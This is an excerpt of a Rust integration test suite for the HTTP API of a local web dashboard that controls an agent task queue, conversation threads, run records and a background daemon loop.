5512 .expect("attachments array");
5513 assert_eq!(atts.len(), 1);
5514 assert_eq!(atts[0]["id"], att_id);
5515 assert_eq!(atts[0]["mime"], "image/png");
5516
5517 let on_disk = f.talks().get(&id).expect("get");
5520 assert_eq!(on_disk.turns[0].attachments.len(), 1);
5521 assert_eq!(on_disk.turns[0].attachments[0].id, att_id);
5522 }
5523
5524 #[tokio::test]
5525 async fn saying_with_an_unknown_attachment_id_is_a_4xx_and_records_nothing() {
5526 let f = Fixture::start().await;
5527 let id = seed_talk(&f, "20260905-000000-a7b8", "open");
5528
5529 let res = f
5530 .post(
5531 &format!("/api/talks/{id}/say"),
5532 Some(&format!(
5533 r#"{{"text":"hi","attachments":["{}"]}}"#,
5534 "a".repeat(32)
5535 )),
5536 )
5537 .await;
5538 assert!((400..500).contains(&res.status), "{}", res.body);
5539 assert!(res.body.contains("unknown attachment"), "{}", res.body);
5540
5541 let on_disk = f.talks().get(&id).expect("get");
5542 assert!(
5543 on_disk.turns.is_empty(),
5544 "a rejected attachment id must not partially record the turn: {:?}",
5545 on_disk.turns
5546 );
5547 }
5548
5549 #[tokio::test]
5550 async fn talk_close_makes_the_talk_refuse_further_turns() {
5551 let f = Fixture::start().await;
5552 let id = seed_talk(&f, "20260904-014455-cd34", "open");
5553
5554 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
5555 assert_eq!(closed.status, 200, "{}", closed.body);
5556 assert_eq!(closed.json()["status"], "closed");
5557
5558 let closed_again = f.post(&format!("/api/talks/{id}/close"), None).await;
5560 assert_eq!(closed_again.status, 200);
5561 assert_eq!(closed_again.json()["status"], "closed");
5562
5563 let said = f
5564 .post(
5565 &format!("/api/talks/{id}/say"),
5566 Some(r#"{"text":"too late"}"#),
5567 )
5568 .await;
5569 assert_eq!(said.status, 409, "{}", said.body);
5570 }
5571
5572 #[tokio::test]
5573 async fn talk_reopen_lets_a_closed_talk_take_turns_again_and_is_idempotent() {
5574 let (_tmp, _repo, f) = talk_fixture().await;
5575 let id = f.post("/api/talks", None).await.json()["id"]
5576 .as_str()
5577 .expect("id")
5578 .to_owned();
5579 let closed = f.post(&format!("/api/talks/{id}/close"), None).await;
5580 assert_eq!(closed.status, 200, "{}", closed.body);
5581
5582 let reopened = f.post(&format!("/api/talks/{id}/reopen"), None).await;
5583 assert_eq!(reopened.status, 200, "{}", reopened.body);
5584 assert_eq!(reopened.json()["status"], "open");
5585
5586 let reopened_again = f.post(&format!("/api/talks/{id}/reopen"), None).await;
5588 assert_eq!(reopened_again.status, 200);
5589 assert_eq!(reopened_again.json()["status"], "open");
5590
5591 let said = f
5592 .post(
5593 &format!("/api/talks/{id}/say"),
5594 Some(r#"{"text":"still there?"}"#),
5595 )
5596 .await;
5597 assert_eq!(
5598 said.status, 202,
5599 "a reopened talk accepts turns again: {}",
5600 said.body
5601 );
5602 }
5603
5604 #[tokio::test]
5605 async fn talk_reopen_on_an_unknown_id_is_404() {
5606 let f = Fixture::start().await;
5607 let res = f.post("/api/talks/nonexistent-id/reopen", None).await;
5608 assert_eq!(res.status, 404, "{}", res.body);
5609 }
5610
5611 #[tokio::test]
5612 async fn talk_delete_removes_the_talk_from_disk_and_the_list() {
5613 let f = Fixture::start().await;
5614 let id = seed_talk(&f, "20260904-014455-ef56", "closed");
5615
5616 let deleted = f.delete(&format!("/api/talks/{id}")).await;
5617 assert_eq!(deleted.status, 204, "{}", deleted.body);
5618
5619 let after = f.get(&format!("/api/talks/{id}")).await;
5620 assert_eq!(after.status, 404, "{}", after.body);
5621
5622 let listed = f.get("/api/talks").await.json();
5623 assert!(
5624 listed.as_array().unwrap().iter().all(|t| t["id"] != id),
5625 "a deleted talk must not linger in the list: {listed}"
5626 );
5627 }
5628
5629 #[tokio::test]
5630 async fn talk_delete_on_an_unknown_id_is_404() {
5631 let f = Fixture::start().await;
5632 let res = f.delete("/api/talks/nonexistent-id").await;
5633 assert_eq!(res.status, 404, "{}", res.body);
5634 }
5635
5636 #[tokio::test]
5637 async fn holding_then_releasing_returns_a_task_to_the_loop_with_a_fresh_budget() {
5638 let f = Fixture::start().await;
5639 let queue = f.queue();
5640 let mut task = Task::new(
5641 "spent".to_owned(),
5642 "Try again".to_owned(),
5643 PathBuf::from("/repo/magi"),
5644 Source::Human,
5645 );
5646 task.start("20260902-140502-bbbb".to_owned());
5647 task.fail("agent gave up", 9);
5648 queue.put(&mut task).expect("file the task");
5649
5650 let held = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
5651 assert_eq!(held.status, 200);
5652 assert_eq!(held.json()["status_str"], "held");
5653
5654 let released = f
5655 .post(&format!("/api/queue/{}/release", task.id), None)
5656 .await;
5657 assert_eq!(released.status, 200);
5658 assert_eq!(released.json()["status_str"], "queued");
5659 assert_eq!(
5660 released.json()["attempts"],
5661 0,
5662 "release is a real second chance, not an instant re-hold"
5663 );
5664 assert_eq!(
5665 queue.get(&task.id).expect("reload").status,
5666 TaskStatus::Queued,
5667 "the change is on disk, not only in the reply"
5668 );
5669 assert!(
5670 !f.home
5671 .path()
5672 .join("queue")
5673 .join(format!("{}.lock", task.id))
5674 .exists(),
5675 "the claim the mutation took is released again"
5676 );
5677 }
5678
5679 #[tokio::test]
5680 async fn a_task_a_daemon_is_running_cannot_be_changed_from_the_phone() {
5681 let f = Fixture::start().await;
5682 let queue = f.queue();
5683 let mut task = Task::new(
5684 "busy".to_owned(),
5685 "Running right now".to_owned(),
5686 PathBuf::from("/repo/magi"),
5687 Source::Human,
5688 );
5689 queue.put(&mut task).expect("file the task");
5690 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
5691
5692 let res = f.post(&format!("/api/queue/{}/hold", task.id), None).await;
5693
5694 assert_eq!(res.status, 409);
5695 assert_eq!(
5696 queue.get(&task.id).expect("reload").status,
5697 TaskStatus::Queued,
5698 "the refused hold changed nothing"
5699 );
5700 }
5701
5702 #[tokio::test]
5703 async fn holding_with_a_reason_reads_back_from_show_and_the_card_and_release_clears_it() {
5704 let f = Fixture::start().await;
5705 let queue = f.queue();
5706 let mut task = Task::new(
5707 "waiting on the migration".to_owned(),
5708 "Do the thing".to_owned(),
5709 PathBuf::from("/repo/magi"),
5710 Source::Human,
5711 );
5712 queue.put(&mut task).expect("file the task");
5713
5714 let held = f
5715 .post(
5716 &format!("/api/queue/{}/hold", task.id),
5717 Some(r#"{"reason":"waiting for 20260101-000000-aaaa to land"}"#),
5718 )
5719 .await;
5720 assert_eq!(held.status, 200, "{}", held.body);
5721 assert_eq!(held.json()["status_str"], "held");
5722 assert_eq!(
5723 held.json()["hold_reason"],
5724 "waiting for 20260101-000000-aaaa to land"
5725 );
5726
5727 let listed = f.get("/api/queue").await.json();
5728 assert_eq!(
5729 listed[0]["hold_reason"], "waiting for 20260101-000000-aaaa to land",
5730 "the card reads the reason off the same list route"
5731 );
5732
5733 let mut plain = Task::new(
5736 "no reason given".to_owned(),
5737 "Do another thing".to_owned(),
5738 PathBuf::from("/repo/magi"),
5739 Source::Human,
5740 );
5741 queue.put(&mut plain).expect("file the task");
5742 let held_plain = f.post(&format!("/api/queue/{}/hold", plain.id), None).await;
5743 assert_eq!(held_plain.status, 200, "{}", held_plain.body);
5744 assert!(held_plain.json()["hold_reason"].is_null());
5745
5746 let released = f
5747 .post(&format!("/api/queue/{}/release", task.id), None)
5748 .await;
5749 assert_eq!(released.status, 200);
5750 assert!(
5751 released.json()["hold_reason"].is_null(),
5752 "a release must clear the reason so the next hold does not inherit it"
5753 );
5754 }
5755
5756 #[tokio::test]
5757 async fn priority_can_be_raised_from_the_phone_and_moves_the_task_ahead() {
5758 let f = Fixture::start().await;
5759 let queue = f.queue();
5760 let mut older = Task::new(
5761 "filed first".to_owned(),
5762 "x".to_owned(),
5763 PathBuf::from("/repo/magi"),
5764 Source::Human,
5765 );
5766 older.id = "20260101-000001-aaaa".to_owned();
5767 let mut newer = Task::new(
5768 "filed second".to_owned(),
5769 "x".to_owned(),
5770 PathBuf::from("/repo/magi"),
5771 Source::Human,
5772 );
5773 newer.id = "20260101-000002-bbbb".to_owned();
5774 queue.put(&mut older).expect("file older");
5775 queue.put(&mut newer).expect("file newer");
5776
5777 let before = f.get("/api/queue").await.json();
5780 assert_eq!(before[0]["id"], newer.id);
5781 assert_eq!(before[1]["id"], older.id);
5782
5783 let raised = f
5787 .post(
5788 &format!("/api/queue/{}/priority", older.id),
5789 Some(r#"{"priority":10}"#),
5790 )
5791 .await;
5792 assert_eq!(raised.status, 200, "{}", raised.body);
5793 assert_eq!(raised.json()["priority"], 10);
5794
5795 let after = f.get("/api/queue").await.json();
5796 let names: Vec<&str> = after
5797 .as_array()
5798 .unwrap()
5799 .iter()
5800 .map(|t| t["id"].as_str().unwrap())
5801 .collect();
5802 assert_eq!(names[0], older.id, "the raised task now sorts first");
5806 }
5807
5808 #[tokio::test]
5809 async fn priority_is_refused_on_a_running_task_with_a_reason_in_the_body() {
5810 let f = Fixture::start().await;
5811 let queue = f.queue();
5812 let mut task = Task::new(
5813 "in flight".to_owned(),
5814 "x".to_owned(),
5815 PathBuf::from("/repo/magi"),
5816 Source::Human,
5817 );
5818 task.start("20260902-140502-bbbb".to_owned());
5819 queue.put(&mut task).expect("file the task");
5820
5821 let res = f
5822 .post(
5823 &format!("/api/queue/{}/priority", task.id),
5824 Some(r#"{"priority":9}"#),
5825 )
5826 .await;
5827 assert_eq!(res.status, 400, "{}", res.body);
5828 assert!(
5829 res.json()["error"]
5830 .as_str()
5831 .is_some_and(|e| e.contains("running")),
5832 "{}",
5833 res.body
5834 );
5835 assert_eq!(
5836 queue.get(&task.id).expect("reload").priority,
5837 0,
5838 "the refused write must not partially apply"
5839 );
5840 }
5841
5842 #[tokio::test]
5843 async fn editing_replaces_title_and_instruction_and_keeps_id_created_at_source_and_runs() {
5844 let f = Fixture::start().await;
5845 let queue = f.queue();
5846 let mut task = Task::new(
5847 "old title".to_owned(),
5848 "old instruction".to_owned(),
5849 PathBuf::from("/repo/magi"),
5850 Source::Agent {
5851 run: "20260101-000000-beef".to_owned(),
5852 node: "implement".to_owned(),
5853 },
5854 );
5855 task.runs.push("20260101-000000-beef".to_owned());
5856 queue.put(&mut task).expect("file the task");
5857 let created_at = task.created_at;
5858
5859 let edited = f
5860 .post(
5861 &format!("/api/queue/{}/edit", task.id),
5862 Some(r#"{"title":"new title","instruction":"new instruction"}"#),
5863 )
5864 .await;
5865 assert_eq!(edited.status, 200, "{}", edited.body);
5866 let body = edited.json();
5867 assert_eq!(body["title"], "new title");
5868 assert_eq!(body["instruction"], "new instruction");
5869 assert_eq!(body["id"], task.id, "editing must not mint a new id");
5870 assert_eq!(body["created_at"], created_at.to_string());
5871 assert_eq!(
5872 body["source"]["kind"], "agent",
5873 "editing a task an agent filed must not turn it human: {body}"
5874 );
5875 assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
5876
5877 let reloaded = queue.get(&task.id).expect("reload");
5878 assert_eq!(reloaded.title, "new title");
5879 assert_eq!(reloaded.instruction, "new instruction");
5880 }
5881
5882 #[tokio::test]
5883 async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
5884 let f = Fixture::start().await;
5885 let queue = f.queue();
5886 let mut task = Task::new(
5887 "in flight".to_owned(),
5888 "do not touch".to_owned(),
5889 PathBuf::from("/repo/magi"),
5890 Source::Human,
5891 );
5892 task.start("20260902-140502-bbbb".to_owned());
5893 queue.put(&mut task).expect("file the task");
5894
5895 let res = f
5896 .post(
5897 &format!("/api/queue/{}/edit", task.id),
5898 Some(r#"{"title":"x","instruction":"y"}"#),
5899 )
5900 .await;
5901 assert_eq!(res.status, 400, "{}", res.body);
5902 assert!(
5903 res.json()["error"]
5904 .as_str()
5905 .is_some_and(|e| e.contains("running")),
5906 "{}",
5907 res.body
5908 );
5909 assert_eq!(
5910 queue.get(&task.id).expect("reload").instruction,
5911 "do not touch",
5912 "the refused edit must not change the file"
5913 );
5914 }
5915
5916 #[tokio::test]
5917 async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
5918 let f = Fixture::start().await;
5919 let queue = f.queue();
5920 let mut task = Task::new(
5921 "busy".to_owned(),
5922 "Running right now".to_owned(),
5923 PathBuf::from("/repo/magi"),
5924 Source::Human,
5925 );
5926 queue.put(&mut task).expect("file the task");
5927 let _claim = queue.claim(&task.id).expect("stand in for the daemon");
5928
5929 let priority = f
5930 .post(
5931 &format!("/api/queue/{}/priority", task.id),
5932 Some(r#"{"priority":9}"#),
5933 )
5934 .await;
5935 assert_eq!(priority.status, 409, "{}", priority.body);
5936
5937 let edit = f
5938 .post(
5939 &format!("/api/queue/{}/edit", task.id),
5940 Some(r#"{"title":"x","instruction":"y"}"#),
5941 )
5942 .await;
5943 assert_eq!(edit.status, 409, "{}", edit.body);
5944 }
5945
5946 #[tokio::test]
5947 async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
5948 let f = Fixture::start().await;
5949 let queue = f.queue();
5950 let mut task = Task::new(
5951 "shipped by hand".to_owned(),
5952 "merged outside the loop".to_owned(),
5953 PathBuf::from("/repo/magi"),
5954 Source::Agent {
5955 run: "20260101-000000-b455".to_owned(),
5956 node: "implement".to_owned(),
5957 },
5958 );
5959 task.runs.push("20260101-000000-b455".to_owned());
5960 task.runs.push("20260101-000000-9af4".to_owned());
5961 queue.put(&mut task).expect("file the task");
5962 let created_at = task.created_at;
5963
5964 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
5965 assert_eq!(done.status, 200, "{}", done.body);
5966 assert_eq!(done.json()["status_str"], "done");
5967
5968 let reloaded = queue.get(&task.id).expect("a done task is still on disk");
5969 assert_eq!(
5970 reloaded.runs,
5971 ["20260101-000000-b455", "20260101-000000-9af4"]
5972 );
5973 assert_eq!(
5974 reloaded.source,
5975 Source::Agent {
5976 run: "20260101-000000-b455".to_owned(),
5977 node: "implement".to_owned(),
5978 }
5979 );
5980 assert_eq!(reloaded.created_at, created_at);
5981 }
5982
5983 #[tokio::test]
5984 async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
5985 let f = Fixture::start().await;
5990 let queue = f.queue();
5991 let mut task = Task::new(
5992 "landed while held".to_owned(),
5993 "x".to_owned(),
5994 PathBuf::from("/repo/magi"),
5995 Source::Human,
5996 );
5997 task.hold_manual(Some("waiting on 3ed9".to_owned()));
5998 queue.put(&mut task).expect("file the held task");
5999
6000 let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
6001 assert_eq!(done.status, 200, "{}", done.body);
6002 assert_eq!(done.json()["status_str"], "done");
6003 assert!(
6004 done.json()["hold_reason"].is_null(),
6005 "a done task cannot still be waiting on something: {}",
6006 done.body
6007 );
6008 }
6009
6010 #[tokio::test]
6011 async fn unknown_ids_are_json_not_found_on_both_stores() {
6012 let f = Fixture::start().await;
6013
6014 let run = f.get("/api/runs/nosuchrun").await;
6015 let task = f.post("/api/queue/nosuchtask/hold", None).await;
6016
6017 assert_eq!(run.status, 404);
6018 assert_eq!(task.status, 404);
6019 assert!(
6020 run.json()["error"]
6021 .as_str()
6022 .is_some_and(|e| e.contains("run")),
6023 "the error names what was not found: {}",
6024 run.body
6025 );
6026 assert!(
6027 task.json()["error"]
6028 .as_str()
6029 .is_some_and(|e| e.contains("task")),
6030 "the error names what was not found: {}",
6031 task.body
6032 );
6033 }
6034
6035 #[tokio::test]
6036 async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
6037 let f = Fixture::start().await;
6038
6039 let missing = f.get("/api/health").await.json();
6040 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6041
6042 write_daemon(
6043 f.home.path(),
6044 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6045 );
6046 let stale = f.get("/api/health").await.json();
6047 assert_eq!(
6048 stale["daemon"]["running"], false,
6049 "a minute without a heartbeat is a dead daemon, not a busy one"
6050 );
6051 assert!(
6052 stale["daemon"]["stale_for_secs"]
6053 .as_i64()
6054 .is_some_and(|s| s >= 55),
6055 "staleness is reported so the UI can say how long: {stale}"
6056 );
6057
6058 write_daemon(f.home.path(), Timestamp::now());
6059 let fresh = f.get("/api/health").await.json();
6060 assert_eq!(fresh["daemon"]["running"], true);
6061 assert_eq!(fresh["daemon"]["idle"], false);
6062 assert_eq!(fresh["daemon"]["pid"], 4242);
6063 assert_eq!(fresh["daemon"]["completed"], 7);
6064 assert_eq!(
6065 fresh["daemon"]["current"][0]["task"],
6066 "20260902-140501-aaaa"
6067 );
6068 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6069 }
6070
6071 #[tokio::test]
6072 async fn the_loop_is_not_running_until_something_starts_it() {
6073 let f = Fixture::start().await;
6074
6075 let view = f.get("/api/loop").await.json();
6076 assert_eq!(view["running"], false);
6077 assert_eq!(
6078 view["owned"], false,
6079 "nobody owns a loop that does not exist: {view}"
6080 );
6081 assert_eq!(view["stopping"], false);
6082 assert_eq!(view["last_error"], Value::Null);
6083 assert_eq!(view["daemon"]["running"], false);
6084 assert_eq!(
6085 view["repo"], "/repo/magi",
6086 "the repository a start would use, named before it is started"
6087 );
6088 }
6089
6090 #[tokio::test]
6091 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6092 let f = Fixture::start().await;
6093
6094 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6095 assert_eq!(res.status, 200, "{}", res.body);
6096 let view = res.json();
6097 assert_eq!(view["running"], true);
6098 assert_eq!(
6099 view["owned"], true,
6100 "the loop the UI started is the UI's own to stop: {view}"
6101 );
6102 assert_eq!(
6103 view["merge"],
6104 Value::Null,
6105 "no override was given, so each repository's own config decides"
6106 );
6107
6108 let health = f.get("/api/health").await.json();
6112 assert_eq!(health["loop"]["running"], true, "{health}");
6113 assert_eq!(health["loop"]["owned"], true, "{health}");
6114
6115 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6116 }
6117
6118 #[tokio::test]
6119 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6120 let f = Fixture::start().await;
6121 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6122 assert_eq!(first.status, 200, "{}", first.body);
6123
6124 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6125 assert_eq!(
6126 again.status, 409,
6127 "two loops on one queue race for the same claims: {}",
6128 again.body
6129 );
6130 assert!(
6131 again.json()["error"]
6132 .as_str()
6133 .is_some_and(|e| e.contains("already running the loop")),
6134 "the refusal has to say why: {}",
6135 again.body
6136 );
6137 assert_eq!(
6138 f.get("/api/loop").await.json()["running"],
6139 true,
6140 "and the loop that was already running is untouched by it"
6141 );
6142
6143 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6144 }
6145
6146 #[tokio::test]
6147 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
6148 let f = Fixture::start().await;
6149 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6150
6151 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6152 assert_eq!(
6153 res.status, 200,
6154 "the answer must not wait for the loop: a run in flight is tens of \
6155 minutes and the operator is holding a phone: {}",
6156 res.body
6157 );
6158
6159 let view = settled(&f, |v| v["running"] == false).await;
6160 assert_eq!(view["owned"], false);
6161 assert_eq!(
6162 view["stopping"], false,
6163 "a loop that has stopped is not still stopping: {view}"
6164 );
6165 assert_eq!(
6166 view["last_error"],
6167 Value::Null,
6168 "a loop that was asked to stop did not fail: {view}"
6169 );
6170
6171 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6174 assert_eq!(twice.status, 200, "{}", twice.body);
6175 }
6176
6177 #[tokio::test]
6178 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
6179 let f = Fixture::start().await;
6180 write_daemon(f.home.path(), Timestamp::now());
6183
6184 let view = f.get("/api/loop").await.json();
6185 assert_eq!(view["running"], false, "not in this process: {view}");
6186 assert_eq!(view["owned"], false, "and not this process's to control");
6187 assert_eq!(
6188 view["daemon"]["running"], true,
6189 "but a loop is alive somewhere, which is what the UI must say"
6190 );
6191 assert_eq!(view["daemon"]["pid"], 4242);
6192
6193 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
6194 let res = f.post("/api/loop", Some(body)).await;
6195 assert_eq!(
6196 res.status, 409,
6197 "neither button may pretend to work on someone else's loop: {}",
6198 res.body
6199 );
6200 assert!(
6201 res.json()["error"]
6202 .as_str()
6203 .is_some_and(|e| e.contains("4242")),
6204 "the refusal has to name the process the operator must go to: {}",
6205 res.body
6206 );
6207 }
6208 assert_eq!(
6209 f.get("/api/loop").await.json()["running"],
6210 false,
6211 "and the refusal started nothing"
6212 );
6213 }
6214
6215 #[tokio::test]
6216 async fn a_stale_status_file_is_not_a_foreign_owner() {
6217 let f = Fixture::start().await;
6218 write_daemon(
6219 f.home.path(),
6220 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6221 );
6222
6223 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6224 assert_eq!(
6225 res.status, 200,
6226 "a daemon killed a minute ago must not lock the loop out of its \
6227 own home for good: {}",
6228 res.body
6229 );
6230 assert_eq!(res.json()["running"], true);
6231
6232 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6233 }
6234
6235 #[tokio::test]
6236 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
6237 let f = Fixture::start().await;
6238 let before = f.get("/api/health").await.json()["loop_rev"]
6239 .as_u64()
6240 .expect("a loop revision");
6241
6242 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6243
6244 let after = f.get("/api/health").await.json()["loop_rev"]
6245 .as_u64()
6246 .expect("a loop revision");
6247 assert!(
6248 after > before,
6249 "the loop is in-process state, so this counter is the only thing \
6250 that tells a second device the first one started it: {before} -> \
6251 {after}"
6252 );
6253
6254 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6255 }
6256
6257 #[tokio::test]
6258 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
6259 let f = Fixture::with_loop(launch_broken).await;
6260
6261 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6262 assert_eq!(
6263 res.status, 200,
6264 "starting it is not the failure: {}",
6265 res.body
6266 );
6267
6268 let view = settled(&f, |v| v["last_error"].is_string()).await;
6269 assert_eq!(
6270 view["running"], false,
6271 "a loop that died must not read as running, or the operator has \
6272 nothing to press: {view}"
6273 );
6274 assert_eq!(view["owned"], false);
6275 assert!(
6276 view["last_error"]
6277 .as_str()
6278 .is_some_and(|e| e.contains("read-only file system")),
6279 "the phone is where a loop that died at 3am is visible: {view}"
6280 );
6281
6282 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6285 assert_eq!(again.status, 200, "{}", again.body);
6286 assert_eq!(
6287 again.json()["last_error"],
6288 Value::Null,
6289 "a fresh start does not keep showing why the last one died"
6290 );
6291 }
6292
6293 #[tokio::test]
6305 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
6306 let home = TempDir::new().expect("temp home");
6307 let runs = home.path().join("runs");
6308 std::fs::create_dir_all(&runs).expect("runs dir");
6309 let ui = Ui::new(
6310 Queue::at(home.path().join("queue")),
6311 Questions::at(home.path().join("questions")),
6312 Talks::at(home.path().join("talks")),
6313 runs,
6314 home.path().to_path_buf(),
6315 PathBuf::from("/repo/magi"),
6316 )
6317 .with_worktrees_root(home.path().join("wt"))
6318 .with_launch(launch_knocking_on_the_way_out);
6319 let looping = ui.looping();
6320 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
6321 .await
6322 .expect("bind loopback");
6323 let addr = listener.local_addr().expect("local addr");
6324 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
6325 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
6326
6327 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
6328 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
6329
6330 let bound = std::sync::Mutex::new(None);
6333 hand_over(home.path(), &looping, served, || {
6334 let attempt = std::net::TcpListener::bind(addr).map_err(|e| e.to_string());
6335 *bound.lock().expect("bound") = Some(attempt);
6336 Ok(())
6337 })
6338 .await
6339 .expect("hand over");
6340
6341 assert_eq!(
6342 *PARK_HEARD.lock().expect("park heard"),
6343 Some(200),
6344 "the deck must answer while the loop is parking"
6345 );
6346 let attempt = bound
6347 .lock()
6348 .expect("bound")
6349 .take()
6350 .expect("the successor was started");
6351 assert!(
6352 attempt.is_ok(),
6353 "and the address must be free by the time it is: {attempt:?}"
6354 );
6355 }
6356
6357 #[tokio::test]
6358 async fn a_newer_daemon_status_file_still_renders() {
6359 let f = Fixture::start().await;
6360 std::fs::write(
6363 f.home.path().join("daemon.json"),
6364 serde_json::json!({
6365 "schema": 2,
6366 "updated_at": Timestamp::now().to_string(),
6367 "idle": true,
6368 "surprise": { "nested": [1, 2, 3] },
6369 })
6370 .to_string(),
6371 )
6372 .expect("write daemon.json");
6373
6374 let health = f.get("/api/health").await;
6375
6376 assert_eq!(health.status, 200);
6377 assert_eq!(health.json()["daemon"]["running"], true);
6378 }
6379
6380 #[tokio::test]
6381 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
6382 let f = Fixture::start().await;
6383 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
6384 let broken = f.runs().join("20260902-140502-bad");
6385 std::fs::create_dir_all(&broken).expect("run dir");
6386 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
6387
6388 let list = f.get("/api/runs").await;
6389 let detail = f.get("/api/runs/20260902-140502-bad").await;
6390
6391 assert_eq!(list.status, 200);
6392 let listed = list.json();
6393 let ids: Vec<&str> = listed
6394 .as_array()
6395 .expect("an array")
6396 .iter()
6397 .map(|r| r["id"].as_str().expect("an id"))
6398 .collect();
6399 assert_eq!(
6400 ids,
6401 vec!["20260902-140501-good"],
6402 "one unreadable run must not cost the operator the whole history"
6403 );
6404 assert_eq!(detail.status, 500);
6405 assert!(
6406 detail.json()["error"]
6407 .as_str()
6408 .is_some_and(|e| e.contains("run.json")),
6409 "the failure names the file to look at: {}",
6410 detail.body
6411 );
6412 let health = f.get("/api/health").await;
6416 assert_eq!(health.json()["runs_unreadable"], 1);
6417 }
6418
6419 #[tokio::test]
6420 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
6421 let f = Fixture::start().await;
6422 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
6423
6424 let summary = f.get("/api/runs").await.json();
6425 let row = &summary[0];
6426 assert_eq!(row["short"], "a1b2");
6427 assert_eq!(row["status"], "ready");
6428 assert_eq!(row["done"], true);
6429 assert_eq!(row["title"], "Add a web UI");
6430 assert_eq!(row["repo_name"], "magi");
6431 assert_eq!(row["judges"], 3);
6432 assert_eq!(row["winner"], Value::Null);
6433 assert_eq!(row["reviews"], 0);
6434
6435 let detail = f.get("/api/runs/a1b2").await;
6438 assert_eq!(detail.status, 200);
6439 assert_eq!(detail.json()["base_branch"], "main");
6440 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
6441 }
6442
6443 #[tokio::test]
6451 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
6452 let f = Fixture::start().await;
6453
6454 let mut none_run = RunState::new(
6455 PathBuf::from("/repo/magi"),
6456 "main".to_owned(),
6457 "0123456789abcdef".to_owned(),
6458 "Add a web UI".to_owned(),
6459 Config::default(),
6460 );
6461 none_run.id = "20260902-140503-none".to_owned();
6462 none_run.status = RunStatus::Ready;
6463 none_run.merge = Some(crate::run::MergeOutcome {
6464 mode: crate::config::MergeMode::None,
6465 ok: true,
6466 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
6467 });
6468 write_state(&f.runs(), &none_run);
6469
6470 let mut pr_run = RunState::new(
6471 PathBuf::from("/repo/magi"),
6472 "main".to_owned(),
6473 "0123456789abcdef".to_owned(),
6474 "Add a web UI".to_owned(),
6475 Config::default(),
6476 );
6477 pr_run.id = "20260902-140504-prcl".to_owned();
6478 pr_run.status = RunStatus::Ready;
6479 pr_run.merge = Some(crate::run::MergeOutcome {
6480 mode: crate::config::MergeMode::Pr,
6481 ok: false,
6482 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
6483 });
6484 write_state(&f.runs(), &pr_run);
6485
6486 let summary = f.get("/api/runs").await.json();
6487 let rows: std::collections::HashMap<&str, &Value> = summary
6488 .as_array()
6489 .expect("an array")
6490 .iter()
6491 .map(|r| (r["id"].as_str().expect("an id"), r))
6492 .collect();
6493 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
6494 assert_eq!(
6495 rows[none_run.id.as_str()]["unmerged_by_design"],
6496 true,
6497 "a mode-none Ready must be flagged in the list"
6498 );
6499 assert_eq!(
6500 rows[pr_run.id.as_str()]["unmerged_by_design"],
6501 false,
6502 "a Ready reached by a closed pull request is a different case"
6503 );
6504
6505 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
6506 assert_eq!(none_detail["status"], "ready");
6507 assert_eq!(none_detail["unmerged_by_design"], true);
6508
6509 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
6510 assert_eq!(pr_detail["unmerged_by_design"], false);
6511 }
6512
6513 #[tokio::test]
6518 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
6519 let f = Fixture::start().await;
6520 let id = "20260902-140502-bbbb";
6524 let mut state = RunState::new(
6525 PathBuf::from("/repo/magi"),
6526 "main".to_owned(),
6527 "0123456789abcdef".to_owned(),
6528 "Add a web UI".to_owned(),
6529 Config::default(),
6530 );
6531 state.id = id.to_owned();
6532 state.status = RunStatus::Judging;
